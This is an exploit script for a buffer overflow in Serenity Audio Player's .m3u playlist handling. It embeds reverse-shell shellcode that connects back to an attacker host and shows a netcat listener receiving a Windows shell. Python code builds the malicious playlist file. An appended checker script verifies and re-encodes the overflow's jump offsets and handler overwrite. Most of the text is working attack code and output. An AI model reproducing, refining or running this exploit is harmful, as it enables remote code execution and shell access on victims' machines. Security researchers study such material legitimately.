# Title : Serenity Audio Player Playlist (.m3u) BOF
# Published : 2009-11-25
# Author : Rick2600
#!/usr/bin/python
#
# ######################################################################
#
# Exploit Title : Serenity Audio Player Playlist (.m3u) BOF
# Discovered by : Rick from Corelan Team (ricks2600[at]gmail[dot]com)
# Author : mr_me
# Author contact : seeleymagic[at]hotmail[dot]com
# Date : nov 24th, 2009
# Type : local and remote code execution
# OS : Windows XP sp3
# Product : Serenity Audio Player
# Version : <= 3.2.3
# Download : http://malsmith.kyabram.biz/serenity/
# Greetz : rick,edi,dellnull,marko T,phifli,corelanc0d3r
# Visit : corelanc0d3r's blog http://www.corelan.be:8800/
#
# ######################################################################
#
# Description:
#
# Serenity is a playlist based audio player for Windows. It features a clean and simple
# interface with minimal overhead. Formats supported are limited only by CODECs and
# drivers installed on the machine.
#
# See the kind of p/p/r (pop/pop/ret) I have to deal with? :P Every candidate ends in
# "retn N", so ESP is adjusted by N extra bytes after the return.
#
# 0x004040e7 pop esi; pop ebp; retn 0x0010
# 0x00404482 pop esi; pop ebp; retn 0x0010
# 0x00404c95 pop ebx; pop ebp; retn 0x0010
# 0x00404dd3 pop edi; pop esi; retn 0x0004
# 0x004054cb pop esi; pop ebx; retn 0x0004
# 0x00405543 pop edi; pop esi; retn 0x0004
# 0x0040558b pop esi; pop ebx; retn 0x0008
# 0x00405641 pop esi; pop ebp; retn 0x0008
# 0x004057af pop ebp; pop ebx; retn 0x0008
# 0x00405855 pop ebx; pop ebp; retn 0x0014
# 0x00405bee pop esi; pop ebx; retn 0x0004
#
# mrme@home:~/serenity$ nc -lvp 4444
# listening on [any] 4444 ...
# 192.168.2.13: inverse host lookup failed: Unknown server error : Connection timed out
# connect to [192.168.2.14] from (UNKNOWN) [192.168.2.13] 3761
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Serenity>
# windows/shell_reverse_tcp - 287 bytes
# http://www.metasploit.com
# LHOST=192.168.2.14, EXITFUNC=seh, LPORT=4444
sc = (
    b"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24"
    b"\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f"
    b"\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84"
    b"\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28"
    b"\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c"
    b"\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64"
    b"\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x5e"
    b"\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
    b"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50"
    b"\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff"
    b"\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43"
    b"\x53\x43\x53\xff\xd0\x68\xc0\xa8\x02\x0e\x66\x68\x11\x5c"
    b"\x66\x53\x89\xe1\x95\x68\xec\xf9\xaa\x60\x57\xff\xd6\x6a"
    b"\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68\x63\x6d\x6a\x50"
    b"\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3\xaa\x95"
    b"\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab"
    b"\x68\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51"
    b"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05"
    b"\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6"
    b"\x79\xff\x75\x04\xff\xd6\xff\x77\xfc\xff\xd0\x68\xf0\x8a"
    b"\x04\x5f\x53\xff\xd6\xff\xd0"
)

boom = b"http://"
boom += b"\x41" * (992 - len(sc) - 10)  # junk up to the near jmp (offset)
boom += b"\x90" * 10                    # some nops just in case (landing pad)
boom += sc                              # shellcode
boom += b"\xe9\xd4\xfe\xff\xff"         # near jmp -300, back into the nop sled: we're flying baby
boom += b"\xeb\xf9\x90\x90"             # nSEH: short jump -7 onto the near jmp above
boom += b"\xe8\x47\x40"                 # SEH: 3-byte partial overwrite (0x004047e8), the 0x00 high byte is never written.. sneaky

# binary mode so no byte of the payload gets newline-translated on write
with open("mr_me_owns_serenity.m3u", "wb") as f:
    f.write(boom)
print("[+] mr_me_owns_serenity.m3u file created successfully")
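The jump arithmetic behind the last three pieces of the buffer (near jmp back over the shellcode, short jmp in nSEH, three-byte handler) is easy to get wrong by a byte, so here is an added layout checker. It is not part of the original exploit: it reproduces the page's region layout (prefix, junk, 10-NOP sled, shellcode, near jmp, nSEH, 3-byte SEH) with a constructed 287-byte INT3 stand-in for the shellcode, encodes both jumps from the computed offsets instead of hard-coding them, decodes them back out of the finished buffer, and also decodes the page's own bytes (\xe9\xd4\xfe\xff\xff and \xeb\xf9) to show where they land. The one assumption is the page's own: the player treats the line as a NUL-terminated string, so the byte after the three handler bytes reads as 0x00; the checker only confirms that the buffer ends exactly on those three bytes and contains no NUL of its own.

```python
"""Layout checker for the SEH-overwrite .m3u buffer built above (added example)."""
import struct

PREFIX = b"http://"          # the page's file starts with this
OFFSET = 992                 # page: bytes between PREFIX and the near jmp
SLED_LEN = 10                # page: ten NOPs in front of the shellcode
HANDLER3 = b"\xe8\x47\x40"   # page: 3-byte partial SEH overwrite -> 0x004047e8

# Constructed stand-in for the page's 287-byte windows/shell_reverse_tcp:
# 287 INT3s. Only the length matters for the offset arithmetic.
FAKE_SHELLCODE = b"\xcc" * 287


def jmp_rel32(src, dst):
    """x86 `jmp rel32` placed at offset src, landing at offset dst."""
    return b"\xe9" + struct.pack("<i", dst - (src + 5))


def jmp_short(src, dst):
    """x86 `jmp rel8` placed at offset src, landing at dst; rel8 must fit a signed byte."""
    rel = dst - (src + 2)
    if not -128 <= rel <= 127:
        raise ValueError("short jump out of range: %d" % rel)
    return b"\xeb" + struct.pack("<b", rel)


def jmp_target(buf, off):
    """Decode the jmp (E9 rel32 or EB rel8) at buf[off]; return its landing offset."""
    op = buf[off]
    if op == 0xE9:
        return off + 5 + struct.unpack_from("<i", buf, off + 1)[0]
    if op == 0xEB:
        return off + 2 + struct.unpack_from("<b", buf, off + 1)[0]
    raise ValueError("no jmp at offset %d (opcode %#x)" % (off, op))


def handler_addr(handler3):
    """Address the 3-byte overwrite resolves to once the string terminator supplies 0x00."""
    return struct.unpack("<I", handler3 + b"\x00")[0]


def layout(shellcode, prefix=PREFIX, offset=OFFSET, sled_len=SLED_LEN):
    """Start offsets of each region, laid out exactly as the page does:
    prefix | junk | NOP sled | shellcode | near jmp | nSEH | 3-byte handler."""
    junk_len = offset - len(shellcode) - sled_len
    if junk_len < 0:
        raise ValueError("shellcode too large for the %d-byte offset" % offset)
    sled = len(prefix) + junk_len
    near = len(prefix) + offset
    return {"sled": sled, "shellcode": sled + sled_len,
            "near_jmp": near, "nseh": near + 5, "seh": near + 9}


def build_m3u(shellcode, handler3=HANDLER3, **kw):
    """Build the file body. Both jumps are encoded from the layout rather than
    hard-coded, so a different shellcode or sled size still lands correctly."""
    off = layout(shellcode, **kw)
    prefix = kw.get("prefix", PREFIX)
    buf = prefix
    buf += b"\x41" * (off["sled"] - len(prefix))               # junk
    buf += b"\x90" * (off["shellcode"] - off["sled"])          # NOP sled
    buf += shellcode
    buf += jmp_rel32(off["near_jmp"], off["sled"])             # back over the shellcode into the sled
    buf += jmp_short(off["nseh"], off["near_jmp"]) + b"\x90\x90"  # nSEH: 2-byte jmp + padding
    buf += handler3                                            # SEH: last thing in the file (no 4th byte)
    return buf


def check(buf, off):
    """Decode both jumps out of the finished buffer and confirm the chain:
    nSEH short jmp -> near jmp -> somewhere inside the NOP sled, and a clean tail."""
    near = jmp_target(buf, off["nseh"])
    land = jmp_target(buf, near)
    ok_chain = near == off["near_jmp"] and off["sled"] <= land < off["shellcode"]
    ok_tail = len(buf) == off["seh"] + 3      # nothing after the 3-byte handler
    no_nul = b"\x00" not in buf               # a NUL inside would truncate the line early
    return ok_chain and ok_tail and no_nul


def page_jumps():
    """The page's own hard-coded jump bytes decoded: (rel32, rel8, bytes into the sled)."""
    off = layout(FAKE_SHELLCODE)
    rel32 = struct.unpack("<i", b"\xd4\xfe\xff\xff")[0]
    rel8 = struct.unpack("<b", b"\xf9")[0]
    land = off["near_jmp"] + 5 + rel32
    return rel32, rel8, land - off["sled"]


if __name__ == "__main__":
    offs = layout(FAKE_SHELLCODE)
    body = build_m3u(FAKE_SHELLCODE)
    print("layout:", offs, "total:", len(body), "ok:", check(body, offs))
    print("page's jumps: rel32=%d rel8=%d, lands %d bytes into the sled" % page_jumps())
    print("handler: %#010x" % handler_addr(HANDLER3))
```

With the page's numbers the near jmp at offset 999 is rel32 -300 and lands 2 bytes into the 10-byte sled, and the nSEH jmp is rel8 -7, landing exactly on the near jmp. Encoded from the layout the near jmp targets the sled start instead (rel32 -302); either is fine as long as the landing point is inside the NOPs, which is what the checker tests rather than any particular constant.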